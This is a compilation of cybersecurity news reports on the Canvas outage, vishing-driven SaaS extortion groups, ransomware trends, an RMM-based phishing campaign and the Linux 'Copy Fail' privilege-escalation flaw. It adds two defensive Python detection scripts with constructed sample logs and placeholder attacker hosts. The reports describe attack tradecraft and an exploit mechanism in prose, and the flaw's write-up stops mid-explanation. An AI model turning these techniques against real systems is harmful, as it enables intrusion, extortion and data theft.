Midday classes were paused when Canvas went offline nationwide after a security alert triggered emergency maintenance. Although the problems first surfaced in Texas, the effects reached campuses far beyond the state, cutting off access to assignments and recorded lectures. With the servers down, assignments disappeared from view and gradebooks were locked; some professors switched to paper handouts, others postponed deadlines on short notice.

By evening, partial functionality had returned, though glitches lingered and not every login worked, leaving doubts about a full recovery. Reports link the incident to ShinyHunters, a hacking collective recently seen compromising cloud environments by exploiting weaknesses in third-party service providers. Details remain limited, but the group's prior attacks used stolen data as leverage against corporate networks.

Rather than brute force, the group typically abuses access weaknesses in shared digital environments; such breaches may go unnoticed at first, with forensic analysis later revealing patterns that match earlier intrusions. Instructure, Canvas's developer, subsequently confirmed that the platform had been placed in temporary maintenance mode after the event. Officials said service would be restored, but institutions faced urgent problems at the point in the term when course activities most demand stability.

Despite assurances, the timing was problematic for schools that depend on seamless access at a pivotal point in the term. Midway through the week, campuses such as Southern Methodist University felt the strain as systems went offline. The University of North Texas System faced similar disruptions shortly afterwards, slowing daily functions. At Baylor University, staff worked under pressure and rescheduling classes became a priority, while Tarrant County College saw delays ripple across departments. With email and portals unreliable, instructors adapted on the fly while leadership tried to keep operations connected.

Because updates lagged, many waited hours just to confirm basic plans. Final exams set for Friday at Southern Methodist University were pushed to Sunday after the widespread system failure left services down. Baylor University rescheduled its tests for the same reason, alerting learners that interruptions might continue without a clear timeline. Officials admitted they lacked answers about how long things would stay broken: access might return in hours or drag on for several days.

Across town, the University of North Texas System cut off broad access to Canvas until faculty and technical staff worked out next steps for ongoing classes, grades, and year-end tests. Farther south, Tarrant County College acknowledged that its digital teams were investigating the breach and watching for effects on learners and staff alike. Unexpected outages reveal how tightly schools now rely on centralised online learning systems.

Not only do tools such as Canvas support daily teaching tasks, but they also handle submission tracking, feedback cycles, and distribution of course materials. When access fails, those functions stall, particularly under pressure such as mid-semester assessments. Interruptions expose the fragile infrastructure beneath routine digital workflows. What stands out is how this event fits a wider pattern: cyber gangs increasingly going after schools and the companies that run their online platforms.

Though they hold vast collections of student records and private details, many learning organizations lack strong digital defenses, and because of these gaps threat actors see them as easier wins when chasing ransom payments. Still probing the incident, campuses are now returning to regular classes, though officials remain alert for leaked data. This disruption highlights once more that when hackers strike widely used online systems, the ripple effects hit countless people at many schools at once.

Canvas Cyberattack Disrupts Universities Nationwide, Thousands of Schools Potentially Impacted


A major cybersecurity breach has disrupted online learning systems at universities across the United States, including the University of Minnesota and University of Wisconsin, after hackers reportedly targeted Canvas, a widely used learning management platform owned by Instructure.
The outage began Thursday evening, leaving students and faculty unable to access Canvas for coursework, assignments, grades, and communication tools. Online screenshots circulating on social media appear to show a message from the hacking group ShinyHunters claiming responsibility for the attack. The message allegedly advised affected institutions to “consult with a cyber advisory firm and contact us privately… to negotiate a settlement.”

A spokesperson for the University of Minnesota confirmed the incident in an official statement:

“The University of Minnesota was notified by Instructure, a software and technology supplier of the University, of a cybersecurity incident affecting its clients worldwide. As of today, users are unable to access Instructure’s Canvas system, which is a cloud- and web-based learning management system for online courses, learning materials and communications. University administrators are awaiting updates from the vendor and taking additional measures to protect University information.”

The University of Wisconsin also acknowledged being impacted by the widespread outage.

“At around 3 p.m. today, UW–Madison became aware we are part of a nationwide Canvas outage. We recognize this is occurring at a very challenging time during final exams and grading, and we’re committed to providing you with support and flexibility as we navigate this significant disruption. Multiple teams are working to address this issue.”

University officials further warned students not to respond to any suspicious prompts from Canvas, including requests to log in, click links, or reset passwords during the outage period.

Cybersecurity experts say attacks like this are becoming increasingly common because a single breach can affect thousands of institutions simultaneously. Adam Marre, chief information security officer at Arctic Wolf, explained:

“Rather than target one institution, one victim, they can get many at once. So in this case, this Canvas software is one that’s used by thousands of educational institutions across the country and therefore it’s a way for these attackers to get highly leveraged on the victim to get them to pay money, so there’s lots of different victims and they can get lots of information with one attack.”

Marre also cautioned users to remain alert against phishing and social engineering attempts following the breach.

“They really need to watch out especially for social engineering attacks. These are the types of attacks that come as emails, texts, direct messages that look innocuous, but they’re really someone trying to trick you, defraud you, do something to further this crime, and so what they want to do is create a sense of urgency to get you to not think, not pause and just act quickly.”

He advised users to avoid clicking suspicious links, directly access platforms through official websites, and ensure multifactor authentication remains enabled on all accounts.

“When attackers get this kind of information or the kind of information that may be involved in this attack, things like emails, names, maybe direct messages, it’s good to remember attackers don’t always use this right away. Often they pause and wait sometimes even months before then using this in phishing attacks and other social engineering attacks.”
Marre added:

“We always need to be on guard when we’re online.”

Canvas is a widely adopted digital education platform used for assignments, lecture videos, grading systems, and academic communication. According to Luke Connolly, a threat analyst at Emsisoft, the hackers claimed that nearly 9,000 schools worldwide may have been affected, with billions of private messages and records potentially exposed.

Experts note that educational institutions have become prime targets for cybercriminals because of the vast amount of sensitive student and staff data they store digitally. Similar attacks in recent years have impacted the Minneapolis Public Schools and the Los Angeles Unified School District.

Connolly stated that the Canvas breach closely resembles a previous cyberattack involving PowerSchool, another education technology provider. In that earlier incident, a college student from Massachusetts was charged in connection with the breach.

He further described ShinyHunters as a loosely organized group of teenagers and young adults based in the United States and the United Kingdom. The group has previously been linked to several high-profile cyberattacks, including one targeting Ticketmaster, owned by Live Nation Entertainment.

BlackFile Extortion Gang Targets Retail and Hospitality Sectors


A new cyber threat actor known as BlackFile has emerged, launching data theft and extortion campaigns against retail and hospitality organizations since February 2026. Also tracked as CL-CRI-1116, UNC6671, and Cordial Spider, the group employs sophisticated vishing attacks, impersonating IT helpdesk staff via spoofed VoIP calls. This tactic preys on frontline employees, tricking them into revealing credentials on fake SSO login pages.

BlackFile's attack chain begins with urgent phone calls claiming account security issues, which direct victims to pixel-perfect phishing sites that harvest credentials and MFA codes. The attackers then register rogue devices to bypass MFA, escalate privileges by scraping employee directories, and exploit SaaS APIs such as Microsoft Graph and Salesforce to exfiltrate sensitive data. They target files containing keywords such as "confidential," "SSN," or "salary," downloading large volumes under legitimate-looking sessions.

Unlike ransomware groups focused on encryption, BlackFile prioritizes pure extortion, leaking stolen data (including customer PII and employee records) on dark web sites before contacting victims. Demands reach seven figures, delivered via compromised email accounts or random Gmail addresses, with added pressure from psychological tactics such as swatting executives. Researchers from Palo Alto Networks' Unit 42 link BlackFile with moderate confidence to "The Com," a network tied to broader cybercrime.

The group's success exploits high staff turnover in retail and hospitality, where social engineering evades traditional defenses. RH-ISAC warns of rising incidents, noting similarities to groups such as ShinyHunters. As SaaS platforms hold crown-jewel data, BlackFile signals a shift to "extortion-first" models that blend digital theft with real-world harassment.

To counter BlackFile, organizations must enforce callback protocols (employees hang up and verify the caller through internal lines) and audit SSO logs for suspicious device registrations. Regular social engineering training, API key rotation, and briefings for executives on swatting are essential for frontline resilience. Retail and hospitality firms that ignore these risks face multimillion-dollar breaches in 2026's volatile threat landscape.

Targeted Ransomware Attacks Rise as Cybercriminals Shift Focus Toward High-Value Victims


Surprisingly, cyber attackers now prefer precision over volume, shifting from broad campaigns to targeted strikes meant to inflict severe damage on fewer targets. Although nationwide ransomware incidents declined in the UK last year, data collected by SonicWall reveals a rise in successful breaches across businesses. Instead of casting wide nets, hackers fine-tune their efforts, making each attempt harder to detect. 

What stands out is not the frequency of attacks but how many actually succeed. Focusing narrowly allows intruders to adapt quickly, exploiting specific weaknesses others might overlook. Eighty-seven percent fewer ransomware incidents were reported, yet twenty percent more organizations faced breaches, a sign that tactics have changed. Attackers now focus on specific companies with better odds of success or higher returns; picking targets deliberately has become the norm, shifting away from mass campaigns toward precision strikes.

One tactic draws attention for targeting firms with shaky safeguards: outdated systems and reliance on fragile operations. Called “big game hunting,” it zeroes in on weakness rather than strength. Smaller companies often find themselves in the line of fire, with ransomware involved in 88% of breaches there, while larger organizations face such attacks less often, at 39%. Vulnerability shapes who gets hit hardest, and older systems, sometimes called zombie tech, pose growing dangers according to security experts.

Because updates stop for these outdated platforms, their flaws linger without fixes and attackers find them easier targets. A case in point is a weakness first found ten years ago in Hikvision internet-connected cameras: in twelve months across the UK, attackers tried to use this opening nearly 67 million times, and about one in five break-in attempts logged by monitoring teams tied back to this issue alone. Surprisingly, few organizations grasp how long attackers often stay undetected in their networks.

Although most IT leaders thought breaches would be spotted quickly, within hours, the data showed intruders typically lingered for around 181 days. That mismatch between perception and reality gives malicious activity space to unfold slowly and unnoticed, spreading across digital environments well before anyone responds. What once moved slowly now races forward, as artificial intelligence fuels sharper rises in digital dangers.

Studies show nearly nine out of ten incidents involve AI-powered tools. Scanning nonstop, these tools probe countless online points every moment, hunting for weak spots. Speed is their weapon, and defenses lag behind as holes are found faster than fixes go live. Years go by, yet many organizations still run systems riddled with outdated flaws, perfect openings for digital intruders.

Skilled ransomware operators constantly refine their tactics, but they also rely on neglect: gaps known for ages stay unfixed. Danger grows quietly when precision strikes meet ignored risks. Small firms face as much threat as large ones, simply because exposure piles up over time, and even basic protections often come too late, if at all. Though many still overlook it, keeping software up to date plays a key role in staying secure online.

Instead of waiting for problems, frequent checks across networks help catch risks early. Some companies run into trouble simply because they trust aging tools too much; old flaws thought harmless yesterday might open doors today. Attackers adapt quickly, especially those deploying tailored ransomware, and as these threats grow sharper, so does the risk for unprepared teams.

Sri Lanka Finance Ministry Loses $2.5 Million in Cyberattack on Payment System


Sri Lanka is trying to recover $2.5 million after a cyberattack on the Finance Ministry’s payment system redirected funds away from their intended recipient, exposing fresh weaknesses in the country’s public financial controls. Officials say the breach involved email manipulation, and the issue surfaced after opposition lawmakers alleged that treasury money had landed in a hacker’s account instead of reaching the correct creditor. The incident has prompted a high-level probe, with authorities treating it as both a financial loss and a serious security breach. 

According to finance ministry secretary Harshana Suriyapperuma, cybercriminals were first detected trying to enter the External Resources Department’s system in January 2026, and the ministry took steps with overseas partners to stop further damage. He said the earlier attempt was contained, but the later payment breach still led to losses that are now under review. The stolen amount formed part of a larger $22.9 million payment, with $2.5 million reportedly disbursed between December 2025 and January 31, 2026. 

The incident has drawn wider attention because it involves government debt repayment funds and an apparent failure in payment verification. Australia’s high commissioner in Sri Lanka said Canberra was aware of irregularities in payments owed to it, and Australian officials are assisting the investigation. That international angle has made the breach more sensitive, since the diverted funds were tied to a sovereign obligation rather than a routine domestic transaction. 

A high-powered committee has been formed to investigate the hacking incident and identify how the payment was rerouted. Opposition lawyers have also asked Parliament to examine the matter, arguing that public finances fall under legislative oversight. The issue has been raised before the Committee on Public Accounts, adding political pressure on the government to explain how the breach happened and whether more funds may have been exposed. 

The episode is a damaging reminder that cyberattacks can hit not just banks and companies but also state payment systems handling international debt obligations. For Sri Lanka, which is still recovering from its severe economic crisis and debt default, even a single diverted payment can deepen concerns about administrative safeguards and digital resilience. The investigation will likely focus on email security, approval controls, and how quickly suspicious payment changes were detected.

Over 80 Organisations Impacted by Phishing Leveraging SimpleHelp and ScreenConnect

Phishing campaigns have evolved from opportunistic scams into structured intrusion operations, and recent findings on a systematic operation built around remote management utilities reinforce that shift.

Researchers have identified an ongoing campaign that has compromised more than 80 organizations across multiple industries since April 2025, with a significant concentration in the United States. The operation deliberately uses vendor-signed Remote Monitoring and Management (RMM) software, allowing attackers to establish covert, persistent access under the guise of legitimate administrative activity.

By deploying modified versions of SimpleHelp and ScreenConnect, the threat actors have bypassed conventional security controls, relying on trusted installation workflows initiated by unwitting users.

The activity aligns with clusters previously observed by independent security teams, but this latest analysis provides deeper insight into the campaign's indicators, behavior, and operational sophistication, highlighting a coordinated effort that continues to extend its reach.

Securonix analysis, which tracks the VENOMOUS#HELPER activity cluster, shows that the operation has maintained continuous momentum since April 2025, extending its reach beyond the U.S. into Western Europe and Latin America. 

The campaign is distinguished by its calculated use of two Remote Monitoring and Management platforms, SimpleHelp and ScreenConnect, both legitimately signed and widely used by enterprises. Rather than deploying conventional malware payloads, the threat actors employ these trusted tools to embed persistent access within victim systems, blending malicious activity with routine administrative functions.

Running two RMM solutions in parallel provides built-in redundancy, ensuring that access continues even if one channel is detected and removed. Although no formal attribution has been established, Securonix concludes that these operational patterns are consistent with financially motivated Initial Access Brokers and early-stage ransomware campaigns, particularly those targeting organizations in economically significant regions.

The VENOMOUS#HELPER cluster shows significant overlap with threat patterns previously documented by Red Canary and Sophos, which designate it STAC6405. Although its operational characteristics are consistent with financially driven initial access brokerage or early-stage ransomware enablement, attribution remains unclear.

A researcher involved in the investigation notes that by deploying SimpleHelp and ScreenConnect in customized configurations, the campaign embeds itself within legitimate administrative workflows and thereby circumvents conventional defensive mechanisms.

Additionally, a deliberate dual-channel access strategy strengthens the resilience and continuity of control even if one access vector is identified and neutralised. The intrusion begins with a carefully crafted phishing email impersonating the U.S. Social Security Administration, asking recipients to verify their email address and download a purported statement via an embedded link.

To bypass email filtering, the link does not point to overtly suspicious infrastructure; instead, it redirects victims to a compromised but otherwise legitimate Mexican business domain. A disguised executable masquerading as an official document is then retrieved from a secondary attacker-controlled domain, which stages the subsequent payload delivery.

That infrastructure was created through a compromised cPanel account on a legitimate hosting environment. When the JWrapper-packaged Windows binary is executed, it initiates a sequence designed to ensure persistence and stability: Windows services are configured to survive Safe Mode, and a self-healing watchdog mechanism automatically restores execution if the process is terminated.

As part of periodic reconnaissance, the implant queries the root/SecurityCenter2 WMI namespace to enumerate installed security solutions. It is also configured to poll user sessions periodically in order to monitor user activity. Together, these behaviors illustrate a level of technical maturity intended to maintain low-visibility access within compromised environments over long periods.

The STAC6405 infection chain reveals a methodical, multi-stage delivery framework designed to delay suspicion until execution is firmly established on the victim's computer. In the first stage, the intrusion begins with phishing emails impersonating the U.S. Social Security Administration, informing recipients that a new statement has been released and requesting immediate action.

Instead of attacker-registered infrastructure, the embedded link redirects to a compromised but legitimate Mexican domain, a method designed to circumvent Secure Email Gateway filtering by drawing on the inherent trust associated with established .com.mx domains. On the landing page, users are required to confirm their email addresses to proceed to the SSA verification interface. This intermediate harvesting step not only validates the target's authenticity but also gives attackers an established communication channel for future targeting.

After this interaction, victims are seamlessly redirected to an attacker-controlled secondary host where a payload is staged for download. The delivery URL structure, with its tilde-prefixed directory names, indicates the compromise of a single cPanel account in a shared hosting environment. The analysis emphasizes that the primary website infrastructure remains intact, with malicious content confined to a subdirectory deliberately named to maintain thematic consistency with the Social Security lure.

To conceal the binary's true nature, the final payload, distributed as a Windows executable, takes advantage of default operating system behavior: file extensions are hidden in Explorer, which makes the binary appear to be a document, while JWrapper packaging incorporates customised visual elements such as iconography and splash screens to reinforce its apparent authenticity.

At each stage of execution, STAC6405 prioritizes credibility, evasion, and user manipulation, reflecting a carefully orchestrated delivery mechanism. The foundation of its effectiveness lies in calculated exploitation of the implicit trust placed in remote administration programs.

Both the SimpleHelp and ScreenConnect binaries are signed with Authenticode certificates issued by globally recognized certificate authorities, which lets them pass signature-based security checks. Traditional antivirus controls do not flag them, Windows SmartScreen and Mark-of-the-Web protections are effectively neutralized, and endpoint detection mechanisms must rely on behavioral telemetry, such as process lineage, rather than static indicators such as file hashes.

From a network perspective, outbound traffic blends with legitimate activity by communicating with infrastructure that appears consistent with commercial software usage rather than overt command-and-control. The instance deployed in this campaign aligns with a cracked distribution of SimpleHelp version 5.0.1, compiled in July 2017, that circulated widely on underground forums between 2016 and 2019.

Given its certificate validity window and lack of license validation, it is highly likely that the threat actors deployed the tool without financial traceability or vendor oversight. This tooling underpins a dual-RMM architecture purposefully engineered so that each tool fulfils a distinct operational role while bolstering the persistence of the other.

The SimpleHelp deployment primarily uses UDP and HTTP communications over port 5555 to connect directly to an IP-based command endpoint for automated surveillance, scripted execution, and low-visibility control. By contrast, ScreenConnect provides interactive, hands-on-keyboard access over TCP port 8041 using a proprietary relay protocol via an attacker-controlled domain.

Separating these channels not only enhances operational flexibility but also creates a resilient setup in which disruption of one channel does not cost the attacker all access.

The SimpleHelp deployment provides remote administration capabilities including full desktop control through VNC-based interaction, command execution via a virtual terminal bridge, silent session establishment without user notification, and privilege escalation mechanisms that bypass conventional User Account Control prompts.

A number of additional features further reinforce persistence, including bidirectional file transfer, automated firewall rule modification, remote scripting, and self-healing service restoration. Cross-platform binaries indicate adaptability: the same toolkit can be used on macOS and Linux systems, expanding the potential attack surface while keeping the same operational footprint across platforms.

VENOMOUS#HELPER illustrates a measured shift in adversary tradecraft in which stealth, legitimacy, and operational resilience take priority over traditional malware deployments. By integrating themselves into trusted administrative ecosystems and using a dual-RMM framework, the operators dissolve the distinction between benign and malicious activity, complicating detection and response.

Through its structured delivery chain, abuse of compromised infrastructure, and use of signed binaries, the campaign made an intentional effort to circumvent conventional controls at every stage of the intrusion life cycle. Defensive strategies based solely on signature detection or known indicators are therefore insufficient in this context.

Organisations must therefore shift their security posture toward behavioural analysis, tight control over remote access tools, and continuous monitoring of process relationships and privilege use. As threat actors refine these techniques, the campaign is a clear indicator that trusted software is becoming an increasingly effective vehicle for executing untrusted intent in cyberspace.
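The behavioural telemetry the analysis calls for can be checked mechanically. The following is an added example, not code from the original article or from Securonix, Sophos or Red Canary: a triage pass over constructed endpoint telemetry that flags the dual-RMM signals described above (an RMM client spawned by a user-launched installer, traffic on the SimpleHelp and ScreenConnect ports to servers the organisation does not sanction, root/SecurityCenter2 enumeration, and a service registered to survive Safe Mode). The event schema, file paths, sanctioned-server list and process-name markers are assumptions.

```python
# Added example (not from the article or the vendors it cites): behavioural
# triage of constructed endpoint telemetry for the dual-RMM pattern.
# Schema, paths, markers and the sanctioned server list are assumptions.
from collections import namedtuple
from ipaddress import ip_address

# Minimal telemetry records (assumed schema).
Proc = namedtuple("Proc", "host pid image parent_image")    # process creation
Conn = namedtuple("Conn", "host pid proto dst dst_port")    # outbound connection
Wmi = namedtuple("Wmi", "host pid namespace")               # WMI namespace query
Service = namedtuple("Service", "host name image safeboot")  # service registration

# Assumed substrings that identify the two RMM clients in an image path.
RMM_MARKERS = ("simplehelp", "screenconnect")
# Ports named in the write-up: SimpleHelp 5555 (UDP/HTTP), ScreenConnect 8041 (TCP).
RMM_PORTS = {5555: "SimpleHelp", 8041: "ScreenConnect"}
# Assumed: the organisation's own approved RMM relay; anything else is suspect.
SANCTIONED_RMM_SERVERS = {"rmm.corp.example"}
# Path fragments meaning "a user ran this" rather than a managed deployment.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")


def is_rmm(image):
    return any(m in image.lower() for m in RMM_MARKERS)


def from_user_path(image):
    return any(p in image.lower() for p in USER_WRITABLE)


def is_ip_literal(dst):
    try:
        ip_address(dst)
        return True
    except ValueError:
        return False


def triage(procs, conns, wmis, services):
    """Return (host, indicator, detail) tuples; an empty list means nothing flagged."""
    findings = []
    rmm_pids = {(p.host, p.pid) for p in procs if is_rmm(p.image)}

    for p in procs:
        # RMM client whose parent lives in a user-writable path: the phishing
        # installer pattern (JWrapper executable from Downloads), not SCCM/Intune.
        if is_rmm(p.image) and from_user_path(p.parent_image):
            findings.append((p.host, "rmm_user_launched", f"{p.image} <- {p.parent_image}"))

    for c in conns:
        # Only RMM processes talking on the RMM ports to servers we do not own.
        if c.dst_port not in RMM_PORTS or (c.host, c.pid) not in rmm_pids:
            continue
        if c.dst in SANCTIONED_RMM_SERVERS:
            continue
        kind = "ip-literal endpoint" if is_ip_literal(c.dst) else "unsanctioned relay"
        findings.append((c.host, "rmm_unsanctioned_server",
                         f"{RMM_PORTS[c.dst_port]} {c.proto}/{c.dst_port} -> {c.dst} ({kind})"))

    for w in wmis:
        # root/SecurityCenter2 enumeration from an RMM process is AV discovery.
        ns = w.namespace.lower().replace("\\", "/")
        if ns == "root/securitycenter2" and (w.host, w.pid) in rmm_pids:
            findings.append((w.host, "rmm_av_enumeration", w.namespace))

    for s in services:
        # An RMM service registered to survive Safe Mode matches the persistence described.
        if s.safeboot and is_rmm(s.image):
            findings.append((s.host, "rmm_safeboot_persistence", f"{s.name}: {s.image}"))

    return findings


# Constructed sample telemetry (not real indicators): ws-17 shows the full pattern,
# ws-22 runs the organisation's own ScreenConnect deployment and must stay clean.
LURE = r"C:\Users\jdoe\Downloads\SSA_Statement.exe"
SAMPLE_PROCS = [
    Proc("ws-17", 4120, r"C:\ProgramData\SimpleHelp\SimpleService.exe", LURE),
    Proc("ws-17", 4188, r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe", LURE),
    Proc("ws-22", 3001, r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
         r"C:\Windows\CCM\CcmExec.exe"),
]
SAMPLE_CONNS = [
    Conn("ws-17", 4120, "udp", "203.0.113.45", 5555),           # TEST-NET placeholder
    Conn("ws-17", 4188, "tcp", "relay.attacker.invalid", 8041),  # placeholder domain
    Conn("ws-22", 3001, "tcp", "rmm.corp.example", 8041),
]
SAMPLE_WMIS = [Wmi("ws-17", 4120, r"root\SecurityCenter2"), Wmi("ws-22", 900, r"root\SecurityCenter2")]
SAMPLE_SERVICES = [
    Service("ws-17", "SimpleHelp Remote Access", r"C:\ProgramData\SimpleHelp\SimpleService.exe", True),
    Service("ws-22", "ScreenConnect Client",
            r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe", False),
]


def run_sample():
    return triage(SAMPLE_PROCS, SAMPLE_CONNS, SAMPLE_WMIS, SAMPLE_SERVICES)
```

Only ws-17 is flagged, on all four indicators; the sanctioned deployment on ws-22 produces nothing because its parent is a management agent and its relay is on the allow-list.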

Hackers Target Cloud Apps Using Phone Scams and Login Tricks

Cybersecurity researchers have identified two threat groups that are executing fast-moving attacks almost entirely within software-as-a-service environments, allowing them to operate with very little visible trace of intrusion.

The groups, tracked as Cordial Spider and Snarky Spider, are also known by multiple alternate identifiers across different security vendors. Investigations show that both groups are involved in high-speed data theft followed by extortion attempts, and their methods show a strong overlap in how operations are carried out. Analysts assess that these groups have been active since at least October 2025. One of them is believed to be composed of native English speakers and is linked to a cybercrime network widely referred to as “The Com.”

According to findings from CrowdStrike, these attackers primarily rely on voice phishing, also known as vishing, to initiate their intrusions. In these cases, individuals are contacted and guided toward fraudulent login pages that are designed to imitate single sign-on systems. These pages act as adversary-in-the-middle setups, meaning they intercept and capture authentication data, including login credentials and session details, as the victim enters them. Once this information is obtained, attackers immediately use it to access SaaS applications that are connected through single sign-on integrations.

Researchers explain that the attackers deliberately operate within trusted SaaS platforms to avoid raising suspicion. Because their activity takes place inside legitimate services already used by organizations, their presence generates fewer detectable signals. This allows them to move quickly from initial compromise to data access. The combination of speed, targeted execution, and reliance on SaaS-only environments makes it harder for defenders to monitor and respond effectively.

Earlier research published in January 2026 by Mandiant revealed that these attack patterns represent a continuation of tactics seen in extortion-focused campaigns linked to the ShinyHunters group. These operations involve impersonating IT staff during phone calls to build trust with victims, then directing them to phishing pages in order to collect both login credentials and multi-factor authentication codes.

More recent analysis from Palo Alto Networks Unit 42 and the Retail & Hospitality ISAC indicates, with moderate confidence, that one of the identified clusters is associated with The Com network. These attacks rely heavily on living-off-the-land techniques, where attackers use legitimate system tools instead of introducing malware. They also make use of residential proxy networks to mask their real geographic location and to evade basic IP-based security filtering systems.

Since February 2026, activity linked to one of these clusters has been directed toward organizations in the retail and hospitality sectors. The attackers combine vishing calls, often impersonating IT help desk personnel, with phishing websites designed to capture employee credentials.

Once access is established, the attackers take steps to maintain long-term control. They register a new device within the compromised account to ensure continued access, and in many cases remove previously registered devices. After doing so, they modify email settings by creating inbox rules that automatically delete notifications related to new device logins or suspicious activity, preventing the legitimate user from being alerted.

Following initial access, the attackers shift their focus toward accounts with higher privileges. They collect internal information, such as employee directories, to identify individuals with elevated access and then use further social engineering techniques to compromise those accounts as well. With increased privileges, they move across SaaS platforms including Google Workspace, HubSpot, Microsoft SharePoint, and Salesforce, searching for sensitive documents and business-critical data. Any valuable information is then exfiltrated to infrastructure controlled by the attackers.

Researchers note that in many observed cases, the stolen credentials provide access to the organization’s identity provider, which acts as a central authentication system. This creates a single entry point into multiple SaaS applications. By exploiting the trust relationships between the identity provider and connected services, attackers are able to move across the organization’s cloud ecosystem without needing to compromise each application separately. This allows them to access multiple systems using a single authenticated session.
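The post-compromise steps described here, and the BlackFile article's advice to audit SSO logs for suspicious device registrations, can be correlated from identity-provider and mailbox audit logs. The following is an added example, not code from the original article or from CrowdStrike, Mandiant or Unit 42: it scores constructed audit events for a new MFA device registration, removal of existing devices within a short window, and an inbox rule that deletes sign-in alerts. The log format, action names and the six-hour window are assumptions.

```python
# Added example (not from the article or the vendors it cites): correlate the
# device-registration / device-removal / alert-hiding-rule sequence in
# constructed audit events. Format, action names and window are assumptions.
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(hours=6)   # assumed: how close the steps must be to correlate
# Subject/sender fragments a rule must match to count as hiding security mail.
ALERT_TERMS = ("new sign-in", "new device", "security alert", "unusual activity")
# Rule actions that keep a notification from ever being seen by the user.
HIDING_ACTIONS = {"delete", "move_to_deleted_items", "mark_read_and_archive"}


def parse(line):
    """Parse one constructed audit line: 'ISO-time|user|action|key=value;key=value'."""
    ts, user, action, raw = line.split("|", 3)
    detail = dict(kv.split("=", 1) for kv in raw.split(";") if kv)
    return datetime.fromisoformat(ts), user, action, detail


def rule_hides_alerts(detail):
    conds = detail.get("conditions", "").lower()
    actions = set(detail.get("actions", "").lower().split(","))
    return bool(actions & HIDING_ACTIONS) and any(t in conds for t in ALERT_TERMS)


def assess(lines):
    """Return {user: (severity, sorted indicators)} for accounts showing a device
    registration or an alert-hiding rule; accounts with neither are omitted."""
    by_user = defaultdict(list)
    for line in lines:
        ts, user, action, detail = parse(line)
        by_user[user].append((ts, action, detail))
    out = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e[0])
        indicators = set()
        for i, (ts, action, detail) in enumerate(evs):
            # A rule that silently deletes sign-in alerts is suspicious on its own.
            if action == "inbox_rule_created" and rule_hides_alerts(detail):
                indicators.add("alert_rule")
            if action != "mfa_device_registered":
                continue
            indicators.add("device_registered")
            # Look forward for removal of other devices within the window.
            for ts2, action2, _ in evs[i + 1:]:
                if ts2 - ts > WINDOW:
                    break
                if action2 == "mfa_device_removed":
                    indicators.add("old_device_removed")
        if not indicators:
            continue
        if "alert_rule" in indicators:
            severity = "high"
        elif {"device_registered", "old_device_removed"} <= indicators:
            severity = "medium"
        else:
            severity = "info"   # enrolments alone are routine
        out[user] = (severity, sorted(indicators))
    return out


# Constructed sample log (no real users or addresses). bob shows the full chain,
# dave's removal falls outside the window, carol's rule is a harmless filter.
SAMPLE_LOG = [
    "2026-03-02T09:00:00|alice|mfa_device_registered|device=iPhone",
    "2026-03-02T10:02:00|bob|mfa_device_registered|device=Android",
    "2026-03-02T10:05:00|bob|mfa_device_removed|device=Pixel-old",
    "2026-03-02T10:11:00|bob|inbox_rule_created|conditions=subject contains 'New sign-in';actions=delete",
    "2026-03-02T10:30:00|carol|inbox_rule_created|conditions=from contains 'newsletter';actions=move_to_folder",
    "2026-03-02T11:00:00|dave|mfa_device_registered|device=YubiKey",
    "2026-03-02T20:00:00|dave|mfa_device_removed|device=old-phone",
]


def run_sample():
    return assess(SAMPLE_LOG)
```

A single account at "high" here is a reason to invalidate the session, re-verify the enrolment out of band and review the mailbox rules, since the alert that would normally reach the user has been suppressed.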

CISA Highlights CVE-2026-31431 as an Active Linux Root Exploitation Risk

A recently disclosed Linux kernel vulnerability has attracted heightened scrutiny from the security community following evidence that it can be exploited consistently to obtain full root-level control across a wide range of systems. The flaw, known as “Copy Fail,” affects kernel versions spanning nearly a decade, which dramatically expands its attack surface and poses a significant threat to millions of deployments.

It is tracked as CVE-2026-31431. Security researchers emphasize that the issue is significant not only as a privilege escalation but also for its operational simplicity, cross-environment portability, and high exploitation success rate, factors which together raise its threat profile and explain why it has been classified as an actively exploited vulnerability.

Upon reviewing these findings, the Cybersecurity and Infrastructure Security Agency (CISA) has formally escalated the issue by adding the flaw to its Known Exploited Vulnerabilities (KEV) catalogue, which indicates confirmed instances of exploitation across multiple Linux distributions in the wild. 

The weakness carries a CVSS score of 7.8 and is classed as a local privilege escalation (LPE) vulnerability, meaning an unprivileged user with local access can elevate to root. However, its long undetected lifetime, combined with a reliable exploitation path, makes it an operational risk far greater than its moderate score suggests.

Security researchers at Theori and Xint first identified and analyzed the issue under the designation “Copy Fail.” It arises from the incorrect transfer of resources between security contexts within the Linux kernel, which can be exploited to bypass standard privilege boundaries.

Kernel patches, including versions 6.18.22, 6.19.12, and 7.0, have been released in response to the vulnerability, which is being actively exploited. Federal guidance urges organisations to prioritize updating given that active exploitation status. The flaw's unusually low barrier to exploitation and wide ecosystem impact reinforce that urgency.

According to researchers, an exploit can be executed with as little as 732 bytes of code, which significantly reduces the threshold for abuse and extends its reach across virtually all major Linux distributions since 2017. 

At the core of the vulnerability, unprivileged local users are able to manipulate the kernel's in-memory page cache of readable files, including setuid binaries. By doing so, executables can be modified at runtime without altering the files on disk. Injecting code into a trusted setuid binary such as /usr/bin/su yields execution with root-level permissions, creating a stealthy path to privilege escalation.

Security analysts at Wiz have stated that this in-memory tampering fundamentally undermines traditional integrity assumptions, since the page cache serves as the live execution layer for binaries. The risk is compounded in modern cloud and containerised infrastructure running Linux workloads at scale.

According to Kaspersky's analysis, environments that rely on container technologies such as Docker, LXC, and Kubernetes may be particularly exposed. By default, container processes can interact with the AF_ALG subsystem if the algif_aead module is present in the host kernel, which expands the attack surface and enables privilege escalation across container boundaries.

In a technical sense, the vulnerability originates from a logic flaw within the Linux kernel's cryptographic pipeline, specifically the authenticated encryption template ("authenc"), where incomplete handling allows memory interactions that were not intended. 

Essentially, the vulnerability gives a local, unprivileged user a controlled four-byte write primitive into any readable file's page cache. That capability looks constrained, but it has severe security implications when applied to executable memory.

A key component of the exploit chain is the AF_ALG interface, which exposes kernel cryptographic operations to user space, together with the splice() system call, which is used to redirect data flows away from conventional buffers and into the kernel page cache.

